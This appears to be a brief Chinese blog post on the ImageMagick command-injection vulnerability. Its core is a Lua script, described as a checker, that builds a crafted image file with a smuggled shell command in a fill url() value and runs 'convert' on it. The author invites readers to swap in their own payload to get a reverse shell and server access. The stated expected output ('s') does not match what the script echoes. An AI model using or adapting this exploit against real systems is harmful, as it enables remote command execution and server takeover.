ImageMagick这个漏洞昨天晚上就出来了，今天才有时间研究一下，今天自己也测试了一下

效果图：

用lua写了一个检测脚本

1 print (“Checking…”)
2 file=io.open(“exp.jpg”,”w”)
3 –file:write(“s”)
4 file:write(“push graphic-context\r\nviewbox 0 0 640 480\r\n”)
5 file:write(“fill ‘url(https://example.com/image.jpg”)
6 file:write(‘”|echo “success!!!)’)
7 file:write(“‘\r\n”)
8 file:write(“pop graphic-context”)
9 file:close()
10 cmd=io.popen(“convert exp.jpg test.png”)
11 result=cmd:read(“*all”)
12 print(result)

如果存在返回

s

当然playload自己改吧，可以直接反弹个shell回来，直接拿到服务器权限

附上一篇分析文章：

http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0